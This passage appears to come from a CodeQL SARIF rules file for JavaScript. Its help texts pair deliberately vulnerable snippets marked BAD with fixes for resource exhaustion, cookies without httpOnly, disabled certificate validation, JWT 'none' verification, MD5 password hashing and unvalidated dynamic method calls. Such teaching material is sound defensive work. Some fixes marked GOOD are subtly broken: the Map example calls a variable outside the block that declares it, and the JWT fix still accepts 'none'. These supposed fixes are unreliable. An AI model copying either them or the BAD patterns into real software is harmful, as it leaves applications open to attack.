15 * 60 * 1000, // 15 minutes\n max: 100, // max 100 requests per windowMs\n});\n\n// apply rate limiter to all 
requests\napp.use(limiter);\n\napp.get('/:path', function(req, res) {\n let path = req.params.path;\n if (isValidPath(path))\n res.sendFile(path);\n});\n\n```\n\n## References\n* OWASP: [Denial of Service Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html).\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* NPM: [express-rate-limit](https://www.npmjs.com/package/express-rate-limit).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n* Common Weakness Enumeration: [CWE-307](https://cwe.mitre.org/data/definitions/307.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-770", "external/cwe/cwe-307", "external/cwe/cwe-400" ], - "description" : "An HTTP request handler that performs expensive operations without\n restricting the rate at which operations can be carried out is vulnerable\n to denial-of-service attacks.", - "id" : "js/missing-rate-limiting", - "kind" : "problem", - "name" : "Missing rate limiting", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/resource-exhaustion", - "name" : "js/resource-exhaustion", - "shortDescription" : { - "text" : "Resource exhaustion" - }, - "fullDescription" : { - "text" : "Allocating objects or timers with user-controlled sizes or durations can cause resource exhaustion." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Resource exhaustion\nApplications are constrained by how many resources they can make use of. Failing to respect these constraints may cause the application to be unresponsive or crash. 
It is therefore problematic if attackers can control the sizes or lifetimes of allocated objects.\n\n\n## Recommendation\nEnsure that attackers can not control object sizes and their lifetimes. If object sizes and lifetimes must be controlled by external parties, ensure you restrict the object sizes and lifetimes so that they are within acceptable ranges.\n\n\n## Example\nThe following example allocates a buffer with a user-controlled size.\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet buffer = Buffer.alloc(size); // BAD\n\n\t// ... use the buffer\n});\n```\nThis is problematic since an attacker can choose a size that makes the application run out of memory. Even worse, in older versions of Node.js, this could leak confidential memory. To prevent such attacks, limit the buffer size:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet buffer = Buffer.alloc(size); // GOOD\n\n\t// ... use the buffer\n});\n```\n\n## Example\nAs another example, consider an application that allocates an array with a user-controlled size, and then fills it with values:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet dogs = new Array(size).fill(\"dog\"); // BAD\n\n\t// ... use the dog\n});\n```\nThe allocation of the array itself is not problematic since arrays are allocated sparsely, but the subsequent filling of the array will take a long time, causing the application to be unresponsive, or even run out of memory. 
Again, a limit on the size will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet dogs = new Array(size).fill(\"dog\"); // GOOD\n\n\t// ... use the dogs\n});\n```\n\n## Example\nFinally, the following example lets a user choose a delay after which a function is executed:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tsetTimeout(f, delay); // BAD\n\n});\n\n```\nThis is problematic because a large delay essentially makes the application wait indefinitely before executing the function. Repeated registrations of such delays will therefore use up all of the memory in the application. A limit on the delay will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tif (delay > 1000) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tsetTimeout(f, delay); // GOOD\n\n});\n\n```\n\n## References\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n", - "markdown" : "# Resource exhaustion\nApplications are constrained by how many resources they can make use of. Failing to respect these constraints may cause the application to be unresponsive or crash. 
It is therefore problematic if attackers can control the sizes or lifetimes of allocated objects.\n\n\n## Recommendation\nEnsure that attackers can not control object sizes and their lifetimes. If object sizes and lifetimes must be controlled by external parties, ensure you restrict the object sizes and lifetimes so that they are within acceptable ranges.\n\n\n## Example\nThe following example allocates a buffer with a user-controlled size.\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet buffer = Buffer.alloc(size); // BAD\n\n\t// ... use the buffer\n});\n```\nThis is problematic since an attacker can choose a size that makes the application run out of memory. Even worse, in older versions of Node.js, this could leak confidential memory. To prevent such attacks, limit the buffer size:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet buffer = Buffer.alloc(size); // GOOD\n\n\t// ... use the buffer\n});\n```\n\n## Example\nAs another example, consider an application that allocates an array with a user-controlled size, and then fills it with values:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet dogs = new Array(size).fill(\"dog\"); // BAD\n\n\t// ... use the dog\n});\n```\nThe allocation of the array itself is not problematic since arrays are allocated sparsely, but the subsequent filling of the array will take a long time, causing the application to be unresponsive, or even run out of memory. 
Again, a limit on the size will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet dogs = new Array(size).fill(\"dog\"); // GOOD\n\n\t// ... use the dogs\n});\n```\n\n## Example\nFinally, the following example lets a user choose a delay after which a function is executed:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tsetTimeout(f, delay); // BAD\n\n});\n\n```\nThis is problematic because a large delay essentially makes the application wait indefinitely before executing the function. Repeated registrations of such delays will therefore use up all of the memory in the application. 
A limit on the delay will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tif (delay > 1000) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tsetTimeout(f, delay); // GOOD\n\n});\n\n```\n\n## References\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-400", "external/cwe/cwe-770" ], - "description" : "Allocating objects or timers with user-controlled\n sizes or durations can cause resource exhaustion.", - "id" : "js/resource-exhaustion", - "kind" : "path-problem", - "name" : "Resource exhaustion", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/client-exposed-cookie", - "name" : "js/client-exposed-cookie", - "shortDescription" : { - "text" : "Sensitive server cookie exposed to the client" - }, - "fullDescription" : { - "text" : "Sensitive cookies set by a server can be read by the client if the `httpOnly` flag is not set." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Sensitive server cookie exposed to the client\nAuthentication cookies stored by a server can be accessed by a client if the `httpOnly` flag is not set.\n\nAn attacker that manages a cross-site scripting (XSS) attack can read the cookie and hijack the session.\n\n\n## Recommendation\nSet the `httpOnly` flag on all cookies that are not needed by the client.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be viewed by the client.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-1004](https://cwe.mitre.org/data/definitions/1004.html).\n", - "markdown" : "# Sensitive server cookie exposed to the client\nAuthentication cookies stored by a server can be accessed by a client if the `httpOnly` flag is not set.\n\nAn attacker that manages a cross-site scripting (XSS) attack can read the cookie and hijack the session.\n\n\n## Recommendation\nSet the `httpOnly` flag on all cookies that are not needed by the client.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be viewed by the client.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-1004](https://cwe.mitre.org/data/definitions/1004.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-1004" ], - "description" : "Sensitive cookies set by a server can be read by the client if the `httpOnly` flag is not set.", - "id" : "js/client-exposed-cookie", - "kind" : "problem", - "name" : "Sensitive server cookie exposed to the client", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "5.0" - } - }, { - "id" : "js/disabling-certificate-validation", - "name" : "js/disabling-certificate-validation", - "shortDescription" : { - "text" : "Disabling certificate validation" - }, - "fullDescription" : { - "text" : "Disabling cryptographic certificate validation can cause security vulnerabilities." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Disabling certificate validation\nCertificate validation is the standard authentication method of a secure TLS connection. Without it, there is no guarantee about who the other party of a TLS connection is, making man-in-the-middle attacks more likely to occur\n\nWhen testing software that uses TLS connections, it may be useful to disable the certificate validation temporarily. 
But disabling it in production environments is strongly discouraged, unless an alternative method of authentication is used.\n\n\n## Recommendation\nDo not disable certificate validation for TLS connections.\n\n\n## Example\nThe following example shows a HTTPS connection that transfers confidential information to a remote server. But the connection is not secure since the `rejectUnauthorized` option of the connection is set to `false`. As a consequence, anyone can impersonate the remote server, and receive the confidential information.\n\n\n```javascript\nlet https = require(\"https\");\n\nhttps.request(\n {\n hostname: \"secure.my-online-bank.com\",\n port: 443,\n method: \"POST\",\n path: \"send-confidential-information\",\n rejectUnauthorized: false // BAD\n },\n response => {\n // ... communicate with secure.my-online-bank.com\n }\n);\n\n```\nTo make the connection secure, the `rejectUnauthorized` option should have its default value, or be explicitly set to `true`.\n\n\n## References\n* Wikipedia: [Transport Layer Security (TLS)](https://en.wikipedia.org/wiki/Transport_Layer_Security)\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Node.js: [TLS (SSL)](https://nodejs.org/api/tls.html)\n* Common Weakness Enumeration: [CWE-295](https://cwe.mitre.org/data/definitions/295.html).\n* Common Weakness Enumeration: [CWE-297](https://cwe.mitre.org/data/definitions/297.html).\n", - "markdown" : "# Disabling certificate validation\nCertificate validation is the standard authentication method of a secure TLS connection. Without it, there is no guarantee about who the other party of a TLS connection is, making man-in-the-middle attacks more likely to occur\n\nWhen testing software that uses TLS connections, it may be useful to disable the certificate validation temporarily. 
But disabling it in production environments is strongly discouraged, unless an alternative method of authentication is used.\n\n\n## Recommendation\nDo not disable certificate validation for TLS connections.\n\n\n## Example\nThe following example shows a HTTPS connection that transfers confidential information to a remote server. But the connection is not secure since the `rejectUnauthorized` option of the connection is set to `false`. As a consequence, anyone can impersonate the remote server, and receive the confidential information.\n\n\n```javascript\nlet https = require(\"https\");\n\nhttps.request(\n {\n hostname: \"secure.my-online-bank.com\",\n port: 443,\n method: \"POST\",\n path: \"send-confidential-information\",\n rejectUnauthorized: false // BAD\n },\n response => {\n // ... communicate with secure.my-online-bank.com\n }\n);\n\n```\nTo make the connection secure, the `rejectUnauthorized` option should have its default value, or be explicitly set to `true`.\n\n\n## References\n* Wikipedia: [Transport Layer Security (TLS)](https://en.wikipedia.org/wiki/Transport_Layer_Security)\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Node.js: [TLS (SSL)](https://nodejs.org/api/tls.html)\n* Common Weakness Enumeration: [CWE-295](https://cwe.mitre.org/data/definitions/295.html).\n* Common Weakness Enumeration: [CWE-297](https://cwe.mitre.org/data/definitions/297.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-295", "external/cwe/cwe-297" ], - "description" : "Disabling cryptographic certificate validation can cause security vulnerabilities.", - "id" : "js/disabling-certificate-validation", - "kind" : "problem", - "name" : "Disabling certificate validation", - "precision" : "very-high", - "problem.severity" : "error", - "security-severity" : "7.5" - } - }, { - "id" : "js/jwt-missing-verification", - "name" : "js/jwt-missing-verification", - "shortDescription" : { - "text" : "JWT 
missing secret or public key verification" - }, - "fullDescription" : { - "text" : "The application does not verify the JWT payload with a cryptographic secret or public key." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# JWT missing secret or public key verification\nApplications decoding JSON Web Tokens (JWT) may be misconfigured due to the `None` algorithm.\n\nThe `None` algorithm is selected by calling the `verify()` function with a falsy value instead of a cryptographic secret or key. The `None` algorithm disables the integrity enforcement of a JWT payload and may allow a malicious actor to make unintended changes to a JWT payload leading to critical security issues like privilege escalation.\n\n\n## Recommendation\nCalls to `verify()` functions should use a cryptographic secret or key to decode JWT payloads.\n\n\n## Example\nIn the example below, `false` is used to disable the integrity enforcement of a JWT payload. This may allow a malicious actor to make changes to a JWT payload.\n\n\n```javascript\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"none\" })\njwt.verify(token, false, { algorithms: [\"HS256\", \"none\"] })\n```\nThe following code fixes the problem by using a cryptographic secret or key to decode JWT payloads.\n\n\n```javascript\n\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"HS256\" }) \njwt.verify(token, secret, { algorithms: [\"HS256\", \"none\"] })\n```\n\n## References\n* Auth0 Blog: [Meet the \"None\" Algorithm](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/#Meet-the--None--Algorithm).\n* Common Weakness Enumeration: [CWE-347](https://cwe.mitre.org/data/definitions/347.html).\n", - "markdown" : "# JWT missing secret or public key verification\nApplications decoding 
JSON Web Tokens (JWT) may be misconfigured due to the `None` algorithm.\n\nThe `None` algorithm is selected by calling the `verify()` function with a falsy value instead of a cryptographic secret or key. The `None` algorithm disables the integrity enforcement of a JWT payload and may allow a malicious actor to make unintended changes to a JWT payload leading to critical security issues like privilege escalation.\n\n\n## Recommendation\nCalls to `verify()` functions should use a cryptographic secret or key to decode JWT payloads.\n\n\n## Example\nIn the example below, `false` is used to disable the integrity enforcement of a JWT payload. This may allow a malicious actor to make changes to a JWT payload.\n\n\n```javascript\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"none\" })\njwt.verify(token, false, { algorithms: [\"HS256\", \"none\"] })\n```\nThe following code fixes the problem by using a cryptographic secret or key to decode JWT payloads.\n\n\n```javascript\n\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"HS256\" }) \njwt.verify(token, secret, { algorithms: [\"HS256\", \"none\"] })\n```\n\n## References\n* Auth0 Blog: [Meet the \"None\" Algorithm](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/#Meet-the--None--Algorithm).\n* Common Weakness Enumeration: [CWE-347](https://cwe.mitre.org/data/definitions/347.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-347" ], - "description" : "The application does not verify the JWT payload with a cryptographic secret or public key.", - "id" : "js/jwt-missing-verification", - "kind" : "problem", - "name" : "JWT missing secret or public key verification", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.0" - } - }, { - "id" : 
"js/insufficient-password-hash", - "name" : "js/insufficient-password-hash", - "shortDescription" : { - "text" : "Use of password hash with insufficient computational effort" - }, - "fullDescription" : { - "text" : "Creating a hash of a password with low computational effort makes the hash vulnerable to password cracking attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Use of password hash with insufficient computational effort\nStoring cryptographic hashes of passwords is standard security practice, but it is equally important to select the right hashing scheme. If an attacker obtains the hashed passwords of an application, the password hashing scheme should still prevent the attacker from easily obtaining the original cleartext passwords.\n\nA good password hashing scheme requires a computation that cannot be done efficiently. Standard hashing schemes, such as `md5` or `sha1`, are efficiently computable, and are therefore not suitable for password hashing.\n\n\n## Recommendation\nUse a secure password hashing scheme such as `bcrypt`, `scrypt`, `PBKDF2`, or `Argon2`.\n\n\n## Example\nIn the example below, the `md5` algorithm computes the hash of a password.\n\n\n```javascript\nconst crypto = require(\"crypto\");\nfunction hashPassword(password) {\n var hasher = crypto.createHash('md5');\n var hashed = hasher.update(password).digest(\"hex\"); // BAD\n return hashed;\n}\n\n```\nThis is not secure, since the password can be efficiently cracked by an attacker that obtains the hash. 
A more secure scheme is to hash the password with the `bcrypt` algorithm:\n\n\n```javascript\nconst bcrypt = require(\"bcrypt\");\nfunction hashPassword(password, salt) {\n var hashed = bcrypt.hashSync(password, salt); // GOOD\n return hashed;\n}\n\n```\n\n## References\n* OWASP: [Password storage](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-916](https://cwe.mitre.org/data/definitions/916.html).\n", - "markdown" : "# Use of password hash with insufficient computational effort\nStoring cryptographic hashes of passwords is standard security practice, but it is equally important to select the right hashing scheme. If an attacker obtains the hashed passwords of an application, the password hashing scheme should still prevent the attacker from easily obtaining the original cleartext passwords.\n\nA good password hashing scheme requires a computation that cannot be done efficiently. Standard hashing schemes, such as `md5` or `sha1`, are efficiently computable, and are therefore not suitable for password hashing.\n\n\n## Recommendation\nUse a secure password hashing scheme such as `bcrypt`, `scrypt`, `PBKDF2`, or `Argon2`.\n\n\n## Example\nIn the example below, the `md5` algorithm computes the hash of a password.\n\n\n```javascript\nconst crypto = require(\"crypto\");\nfunction hashPassword(password) {\n var hasher = crypto.createHash('md5');\n var hashed = hasher.update(password).digest(\"hex\"); // BAD\n return hashed;\n}\n\n```\nThis is not secure, since the password can be efficiently cracked by an attacker that obtains the hash. 
A more secure scheme is to hash the password with the `bcrypt` algorithm:\n\n\n```javascript\nconst bcrypt = require(\"bcrypt\");\nfunction hashPassword(password, salt) {\n var hashed = bcrypt.hashSync(password, salt); // GOOD\n return hashed;\n}\n\n```\n\n## References\n* OWASP: [Password storage](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-916](https://cwe.mitre.org/data/definitions/916.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-916" ], - "description" : "Creating a hash of a password with low computational effort makes the hash vulnerable to password cracking attacks.", - "id" : "js/insufficient-password-hash", - "kind" : "path-problem", - "name" : "Use of password hash with insufficient computational effort", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "8.1" - } - }, { - "id" : "js/unvalidated-dynamic-method-call", - "name" : "js/unvalidated-dynamic-method-call", - "shortDescription" : { - "text" : "Unvalidated dynamic method call" - }, - "fullDescription" : { - "text" : "Calling a method with a user-controlled name may dispatch to an unexpected target, which could cause an exception." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Unvalidated dynamic method call\nJavaScript makes it easy to look up object properties dynamically at runtime. In particular, methods can be looked up by name and then called. However, if the method name is user-controlled, an attacker could choose a name that makes the application invoke an unexpected method, which may cause a runtime exception. If this exception is not handled, it could be used to mount a denial-of-service attack.\n\nFor example, there might not be a method of the given name, or the result of the lookup might not be a function. 
In either case the method call will throw a `TypeError` at runtime.\n\nAnother, more subtle example is where the result of the lookup is a standard library method from `Object.prototype`, which most objects have on their prototype chain. Examples of such methods include `valueOf`, `hasOwnProperty` and `__defineSetter__`. If the method call passes the wrong number or kind of arguments to these methods, they will throw an exception.\n\n\n## Recommendation\nIt is best to avoid dynamic method lookup involving user-controlled names altogether, for instance by using a `Map` instead of a plain object.\n\nIf the dynamic method lookup cannot be avoided, consider whitelisting permitted method names. At the very least, check that the method is an own property and not inherited from the prototype object. If the object on which the method is looked up contains properties that are not methods, you should additionally check that the result of the lookup is a function. Even if the object only contains methods, it is still a good idea to perform this check in case other properties are added to the object later on.\n\n\n## Example\nIn the following example, an HTTP request parameter `action` property is used to dynamically look up a function in the `actions` map, which is then invoked with the `payload` parameter as its argument.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n play(data) {\n // ...\n },\n pause(data) {\n // ...\n }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n let action = actions[req.params.action];\n // BAD: `action` may not be a function\n res.end(action(req.params.payload));\n});\n\n```\nThe intention is to allow clients to invoke the `play` or `pause` method, but there is no check that `action` is actually the name of a method stored in `actions`. 
If, for example, `action` is `rewind`, `action` will be `undefined` and the call will result in a runtime error.\n\nThe easiest way to prevent this is to turn `actions` into a `Map` and using `Map.prototype.has` to check whether the method name is valid before looking it up.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = new Map();\nactions.set(\"play\", function play(data) {\n // ...\n});\nactions.set(\"pause\", function pause(data) {\n // ...\n});\n\napp.get('/perform/:action/:payload', function(req, res) {\n if (actions.has(req.params.action)) {\n if (typeof actions.get(req.params.action) === 'function'){\n let action = actions.get(req.params.action);\n }\n // GOOD: `action` is either the `play` or the `pause` function from above\n res.end(action(req.params.payload));\n } else {\n res.end(\"Unsupported action.\");\n }\n});\n\n```\nIf `actions` cannot be turned into a `Map`, a `hasOwnProperty` check should be added to validate the method name:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n play(data) {\n // ...\n },\n pause(data) {\n // ...\n }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n if (actions.hasOwnProperty(req.params.action)) {\n let action = actions[req.params.action];\n if (typeof action === 'function') {\n // GOOD: `action` is an own method of `actions`\n res.end(action(req.params.payload));\n return;\n }\n }\n res.end(\"Unsupported action.\");\n});\n\n```\n\n## References\n* OWASP: [Denial of Service](https://www.owasp.org/index.php/Denial_of_Service).\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map).\n* MDN: [Object.prototype](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/prototype).\n* Common Weakness Enumeration: [CWE-754](https://cwe.mitre.org/data/definitions/754.html).\n", - "markdown" : "# Unvalidated dynamic method call\nJavaScript 
makes it easy to look up object properties dynamically at runtime. In particular, methods can be looked up by name and then called. However, if the method name is user-controlled, an attacker could choose a name that makes the application invoke an unexpected method, which may cause a runtime exception. If this exception is not handled, it could be used to mount a denial-of-service attack.\n\nFor example, there might not be a method of the given name, or the result of the lookup might not be a function. In either case the method call will throw a `TypeError` at runtime.\n\nAnother, more subtle example is where the result of the lookup is a standard library method from `Object.prototype`, which most objects have on their prototype chain. Examples of such methods include `valueOf`, `hasOwnProperty` and `__defineSetter__`. If the method call passes the wrong number or kind of arguments to these methods, they will throw an exception.\n\n\n## Recommendation\nIt is best to avoid dynamic method lookup involving user-controlled names altogether, for instance by using a `Map` instead of a plain object.\n\nIf the dynamic method lookup cannot be avoided, consider whitelisting permitted method names. At the very least, check that the method is an own property and not inherited from the prototype object. If the object on which the method is looked up contains properties that are not methods, you should additionally check that the result of the lookup is a function. 
Even if the object only contains methods, it is still a good idea to perform this check in case other properties are added to the object later on.\n\n\n## Example\nIn the following example, an HTTP request parameter `action` property is used to dynamically look up a function in the `actions` map, which is then invoked with the `payload` parameter as its argument.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n play(data) {\n // ...\n },\n pause(data) {\n // ...\n }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n let action = actions[req.params.action];\n // BAD: `action` may not be a function\n res.end(action(req.params.payload));\n});\n\n```\nThe intention is to allow clients to invoke the `play` or `pause` method, but there is no check that `action` is actually the name of a method stored in `actions`. If, for example, `action` is `rewind`, `action` will be `undefined` and the call will result in a runtime error.\n\nThe easiest way to prevent this is to turn `actions` into a `Map` and using `Map.prototype.has` to check whether the method name is valid before looking it up.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = new Map();\nactions.set(\"play\", function play(data) {\n // ...\n});\nactions.set(\"pause\", function pause(data) {\n // ...\n});\n\napp.get('/perform/:action/:payload', function(req, res) {\n if (actions.has(req.params.action)) {\n if (typeof actions.get(req.params.action) === 'function'){\n let action = actions.get(req.params.action);\n }\n // GOOD: `action` is either the `play` or the `pause` function from above\n res.end(action(req.params.payload));\n } else {\n res.end(\"Unsupported action.\");\n }\n});\n\n```\nIf `actions` cannot be turned into a `Map`, a `hasOwnProperty` check should be added to validate the method name:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n play(data) 
{\n // ...\n },\n pause(data) {\n // ...\n }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n if (actions.hasOwnProperty(req.params.action)) {\n let action = actions[req.params.action];\n if (typeof action === 'function') {\n // GOOD: `action` is an own method of `actions`\n res.end(action(req.params.payload));\n return;\n }\n }\n res.end(\"Unsupported action.\");\n});\n\n```\n\n## References\n* OWASP: [Denial of Service](https://www.owasp.org/index.php/Denial_of_Service).\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map).\n* MDN: [Object.prototype](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/prototype).\n* Common Weakness Enumeration: [CWE-754](https://cwe.mitre.org/data/definitions/754.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-754" ], - "description" : "Calling a method with a user-controlled name may dispatch to\n an unexpected target, which could cause an exception.", - "id" : "js/unvalidated-dynamic-method-call", - "kind" : "path-problem", - "name" : "Unvalidated dynamic method call", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/clear-text-storage-of-sensitive-data", - "name" : "js/clear-text-storage-of-sensitive-data", - "shortDescription" : { - "text" : "Clear text storage of sensitive information" - }, - "fullDescription" : { - "text" : "Sensitive information stored without encryption or hashing can expose it to an attacker." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Clear text storage of sensitive information\nSensitive information that is stored unencrypted is accessible to an attacker who gains access to the storage. 
